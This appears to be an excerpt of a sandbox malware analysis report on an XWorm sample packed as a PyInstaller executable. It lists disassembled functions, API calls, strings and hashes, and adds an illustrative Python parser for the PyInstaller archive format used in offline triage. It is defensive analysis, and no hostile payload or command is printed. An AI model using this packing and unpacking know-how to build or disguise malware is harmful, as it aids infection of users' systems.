• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _fread_nolock
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 840049012-3497178890
• Opcode ID: 0c3645ffe4b954c7cdac3af421c254594a9a9c955ee43b292e4fc0835233fd45
• Instruction ID: 04fe0394b46b3c1f6f0ce9db7d8b51933c119c72f7c25c432305b1c5e58e16a9
• Opcode Fuzzy Hash: 0c3645ffe4b954c7cdac3af421c254594a9a9c955ee43b292e4fc0835233fd45
• Instruction Fuzzy Hash: 3E71D271B0868685EB60CB24E0903F963A1FF5A780F9490F5E9AEC77D9FE6DE5448700

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: ef7657222e4528701c2384f6a5d2e153e0b799e323a01b0b8a7e67a859d84754
• Instruction ID: 279696541d8bade015a870367066ae10042586f14fb06624f26be22086e27fbe
• Opcode Fuzzy Hash: ef7657222e4528701c2384f6a5d2e153e0b799e323a01b0b8a7e67a859d84754
• Instruction Fuzzy Hash: 07418F61B0864282EB24DB15F4805BA63A0EF567D0FE490B2DE6EC7AD5FE7CE5418700

Control-flow Graph

Control-flow graph of the function at 7ff6fabe11d0 (basic blocks 7ff6fabe11d0-7ff6fabe141d; no Windows API is called directly from the graph). The strings below (inflateInit, the zlib version string 1.3.1, the per-entry extraction errors) identify it as the bootloader's zlib decompression of a single archive entry. Graph rendering omitted.
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: e881507698fb11e158a9860e29cc30c44dc8c29a44b82b02197c1a29374c24d5
• Instruction ID: e5806725412108f7a44753804c1ca7a812eb49f989eb37a78fb93d9739ef329e
• Opcode Fuzzy Hash: e881507698fb11e158a9860e29cc30c44dc8c29a44b82b02197c1a29374c24d5
• Instruction Fuzzy Hash: 27510562A0868251EB60DB11F4803BA6291BF96794FE841B5ED6EC7BC5FF3CE445C300
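
The strings in the three archive-handling functions above (the cookie and TOC reader at 7ff6fabe18d0, the chunk extractor, and the inflate routine at 7ff6fabe11d0 that carries the zlib 1.3.1 version string) describe the PyInstaller onefile archive that this XWorm sample is packed in. Parsing that archive offline, without running the bootloader, is the usual first triage step for such a sample. The Python below is an added example written for this page; it is not the PyInstaller bootloader, not pyinstxtractor, and not Joe Sandbox code. The cookie and TOC layouts follow the PyInstaller 2.1+ CArchive format; the archive it parses is constructed inline, so the fake PE stub, the entry names, the entry contents and the Python version are made up, and the `build_archive` helper exists only to produce that test input.

```python
import struct
import zlib

# PyInstaller (2.1+) CArchive layout: the PKG ends with an 88-byte cookie whose
# magic is "MEI\014\013\012\013\016".  The cookie carries the package length
# (cookie included), the TOC offset and length relative to the package start,
# the Python version and the Python DLL name.  Each TOC entry is an 18-byte
# big-endian header followed by a NUL-padded name.  Only these constants are
# PyInstaller's; the code around them is an added example.
MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"                  # magic, pkg_len, toc_off, toc_len, pyver, pylib
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)  # 88
ENTRY_FMT = "!iIIIBc"                      # entry_len, data_pos, cmp_len, uncmp_len, flag, type
ENTRY_HDR = struct.calcsize(ENTRY_FMT)     # 18


def build_archive(entries, pyver=311, pylib=b"python311.dll"):
    """Write a CArchive-shaped blob from (name, type_code, data, compress) tuples.
    Used only to construct test input for this example."""
    body, toc = bytearray(), bytearray()
    for name, tcode, data, compress in entries:
        blob = zlib.compress(data) if compress else data
        pos = len(body)
        body += blob
        name_b = name.encode("utf-8") + b"\0"
        entry_len = ENTRY_HDR + len(name_b)
        pad = (-entry_len) % 16             # PyInstaller pads each entry to 16 bytes
        toc += struct.pack(ENTRY_FMT, entry_len + pad, pos, len(blob), len(data),
                           int(compress), tcode) + name_b + b"\0" * pad
    pkg_len = len(body) + len(toc) + COOKIE_SIZE   # the cookie counts itself
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(body), len(toc), pyver, pylib)
    return bytes(body + toc) + cookie


def find_cookie(data):
    """Scan backwards from EOF, as the bootloader does: the cookie is the last 88
    bytes of the PKG, but a signed binary can carry an Authenticode overlay after it."""
    idx = data.rfind(MAGIC)
    if idx < 0 or idx + COOKIE_SIZE > len(data):
        raise ValueError("Failed to read cookie!")
    return idx


def parse_archive(data):
    """Return the cookie fields plus a list of TOC entries (name, type, offsets)."""
    cpos = find_cookie(data)
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, cpos)
    pkg_start = cpos + COOKIE_SIZE - pkg_len       # TOC positions are relative to this
    if pkg_start < 0:
        raise ValueError("cookie claims a package larger than the file")
    toc = data[pkg_start + toc_off : pkg_start + toc_off + toc_len]
    if len(toc) != toc_len:
        raise ValueError("Could not read full TOC!")
    entries, off = [], 0
    while off < toc_len:
        entry_len, pos, clen, ulen, flag, tcode = struct.unpack_from(ENTRY_FMT, toc, off)
        if entry_len < ENTRY_HDR or off + entry_len > toc_len:
            raise ValueError("corrupt TOC entry length at offset %d" % off)
        name = toc[off + ENTRY_HDR : off + entry_len].split(b"\0", 1)[0]
        entries.append({"name": name.decode("utf-8", "replace"), "type": tcode.decode(),
                        "pos": pos, "clen": clen, "ulen": ulen, "compressed": bool(flag)})
        off += entry_len
    return {"pyver": pyver, "pylib": pylib.rstrip(b"\0").decode(),
            "pkg_start": pkg_start, "entries": entries}


def extract(data, info, entry):
    """Read one entry.  zlib output is capped at the TOC's uncompressed length, so a
    lying TOC or a decompression bomb fails instead of exhausting memory."""
    start = info["pkg_start"] + entry["pos"]
    raw = data[start : start + entry["clen"]]
    if len(raw) != entry["clen"]:
        raise ValueError("Failed to extract %s: failed to read data chunk!" % entry["name"])
    if not entry["compressed"]:
        return raw
    d = zlib.decompressobj()
    out = d.decompress(raw, entry["ulen"] + 1)   # one byte of slack detects oversize output
    if len(out) != entry["ulen"] or not d.eof:
        raise ValueError("Failed to extract %s: size does not match TOC" % entry["name"])
    return out


def list_entries(data):
    """Triage view: (name, type, uncompressed size) for every TOC entry."""
    return [(e["name"], e["type"], e["ulen"]) for e in parse_archive(data)["entries"]]


# Constructed input: a fake PE stub followed by a three-entry archive.  'o' is a
# runtime option (no data), 's' a script, 'b' a binary; names and contents are made up.
FAKE_PE_STUB = b"MZ" + bytes(62) + b"[PE stub omitted]"
SAMPLE_ENTRIES = [
    ("pyi-runtime-tmpdir", b"o", b"", False),
    ("pyiboot01_bootstrap", b"s", b"import sys\n", True),
    ("payload.dll", b"b", b"MZ" + b"\x90" * 64, True),
]
SAMPLE_FILE = FAKE_PE_STUB + build_archive(SAMPLE_ENTRIES)

if __name__ == "__main__":
    info = parse_archive(SAMPLE_FILE)
    print("python", info["pyver"], info["pylib"], "package starts at", info["pkg_start"])
    for e in info["entries"]:
        print("%-22s %s %6d bytes" % (e["name"], e["type"], e["ulen"]))
    print(extract(SAMPLE_FILE, info, info["entries"][1]))
```

Two points carry over from the bootloader's own behaviour. The cookie is located by scanning backwards rather than assumed to sit at the end of the file, because an Authenticode signature may follow it; and every entry's inflated size is checked against what the TOC claims, which is the same failure class the "Failed to extract %s" strings above report. To triage a real sample, pass the file's bytes to list_entries(); the 'o' entries are the runtime options (pyi-runtime-tmpdir and the others named in the first function's strings), and the 'b' and 'x' entries are where a dropped payload such as the XWorm binary would normally be found.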

Control-flow Graph

Control-flow graph of the function at 7ff6fabfebfc (basic blocks 7ff6fabfebfc-7ff6fabfedb6): LoadLibraryExW at 7ff6fabfec89, a GetLastError check at 7ff6fabfecae followed by two calls to 7ff6fabf515c and a second LoadLibraryExW at 7ff6fabfece8, FreeLibrary at 7ff6fabfed75 and GetProcAddress at 7ff6fabfed7e. Together with the api-ms- and ext-ms- strings this is a module-loading helper that resolves an import by API-set name and retries the load when the first attempt fails. Graph rendering omitted.
APIs
• FreeLibrary.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED78
• GetProcAddress.KERNEL32(?,?,?,00007FF6FABFEF96,?,?,-00000018,00007FF6FABFA8DB,?,?,?,00007FF6FABFA7D2,?,?,?,00007FF6FABF5D5E), ref: 00007FF6FABFED84
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
• Instruction ID: 7eae896d20d601a3cea864bc1705136c38d811f6b8af1151bfab60faeff8ed4f
• Opcode Fuzzy Hash: 273539b1e858eeecb2bd33ed0d4241c55d8440a82afd6c27fbd9155d092c88af
• Instruction Fuzzy Hash: E041D469B19A0245FB15CB56A80067523A5BF86BA0F8C9579ED3ED7BD4FF3CE4058300

                                                                                                                                                                                  Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 516356d96cf40940481ead1f43cbac67c021cc9b8e5dc6dabb769548680b21bc
• Instruction ID: c3002f006280d611fb7b514197dee55ad8e5b0a7fff8853a383ef1c7cba59764
• Opcode Fuzzy Hash: 516356d96cf40940481ead1f43cbac67c021cc9b8e5dc6dabb769548680b21bc
• Instruction Fuzzy Hash: 3BC1D52AA0C78789EB509B95D4402BD7B90EF82B80FDD4179DA6D837D1EE7DE845C700

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6FABE26F4), ref: 00007FF6FABE25D1
  • Part of subcall function 00007FF6FABE1ED0: GetLastError.KERNEL32 ref: 00007FF6FABE1EEC
  • Part of subcall function 00007FF6FABE1ED0: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6FABE25EE,?,00007FF6FABE26F4), ref: 00007FF6FABE1F56
Strings
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ErrorFileFormatLastMessageModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 1234058594-2863816727
• Opcode ID: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
• Instruction ID: 7e53c6e92e006c02139f355eacdbe8c77db174c9963b0569700789ef8149ba67
• Opcode Fuzzy Hash: 3ab6da95184e74374fe48baec535fe5bf269d99fd8fb3e70c2c2714cf1ced2a1
• Instruction Fuzzy Hash: FE216061B1C64281FF24DB35E8913B92261AF6A394FC042B6E67EC65DAFE2CE504C700
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCCFC
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FABFCBCB), ref: 00007FF6FABFCD87
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
• Instruction ID: 5abbc83ef5618b1f62f7c50210971ff04dcbf3ec099f590f37ed649e21fae4ce
• Opcode Fuzzy Hash: c31540d1621b960633301173278a43c162921b7fbac8ddbd441109263ef94ee1
• Instruction Fuzzy Hash: 7591D87AE0865185F750CFA5A4442BD2BA0BB47B88F98517DDE2E96AC4EF38E4D1C700
APIs
Memory Dump Source
• Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
• Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: 79491aa10e773e0c302c047c4418e2f379399a005a06daa6a5ce9d1c3ac76bcc
• Instruction ID: eac6bdee25a9925612cf5e5445845f9d139d0e8daf377f125f5d5eaf104486b5
• Opcode Fuzzy Hash: 79491aa10e773e0c302c047c4418e2f379399a005a06daa6a5ce9d1c3ac76bcc
• Instruction Fuzzy Hash: A541A176D1C78283E7108BA0D5103696660FB963A4F549379E6BC83AD6EF6CA5E08700
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
• Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmp
• Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
Similarity
• API ID: ErrorLast
• String ID: ..\s\ssl\statem\statem.c$state_machine
• API String ID: 1452528299-1722249466
• Opcode ID: fa1af6e95ef90c32761611ab3741ed222fae2e63033c217ccf4e575d4f6d4e5b
• Instruction ID: 2a9ff47c6ff73f1ccfd4a55fd36367db0a633696a5cf16877b5c05b965af7570
• Opcode Fuzzy Hash: fa1af6e95ef90c32761611ab3741ed222fae2e63033c217ccf4e575d4f6d4e5b
• Instruction Fuzzy Hash: A3A17226B0864282F7F69FA594717BD229DEF48B48F148435DA0DA6EC5DF3CE841C741
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                  • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                  • API String ID: 1452528299-4226281315
                                                                                                                                                                                  • Opcode ID: 4c2733c3b718969d1cbac3eb1d3724bd0a089aa37b5c48834b770f1c95388feb
                                                                                                                                                                                  • Instruction ID: 6a82c507f2da0bc24ddf7488661888170d5b056a5c9dfe92d37d5c42624f3332
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c2733c3b718969d1cbac3eb1d3724bd0a089aa37b5c48834b770f1c95388feb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9591A031B08A8292F7B2DFA5D4687B926A8EF48F88F544135DE1D67BA4DF38D845C300
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                  • Opcode ID: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction ID: bd91c1054d8b031c15a9c4be533d474f94fb08711b9c0003abdc50652361a1ac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bce210e197046ffe348e7a14864d607a673f15493918c1003c5f58545c9a52e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89D09E98B0870352FB546FB19C9917D12215F59741F54A4BCC83FC63E7FD2CA44D4600
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,00007FF6FABE1AF6), ref: 00007FF6FABE1E09
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                  • String ID: [%d]
                                                                                                                                                                                  • API String ID: 2050909247-1705522918
                                                                                                                                                                                  • Opcode ID: 567895c906b1ac7ef89c88135c32040e074692b8ac70eb346fb877215d2ad8c6
                                                                                                                                                                                  • Instruction ID: fe25dfc53717ae67c045946c01775ab4e84f0969e9ab867c3f2d2b185c196c9f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 567895c906b1ac7ef89c88135c32040e074692b8ac70eb346fb877215d2ad8c6
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE09262A1CB4581E710EBA4F48106E6260FF99380F5050B8F6ED8779BEF3CD1A08B40
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                  • Opcode ID: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction ID: 0d944b76c3a0a486452a833920b81a7f533ab57ada5ff39e63f3a89c797b0e31
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16af8936fa4a8cfb084170ab3fdfe968383d28d333c1f7fec82ea00825d56c1b
                                                                                                                                                                                  • Instruction Fuzzy Hash: CA511671B1968256FB289E25944067A66D1BF42BA4F8887B4DE7DC37C6FF7CE4008700
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
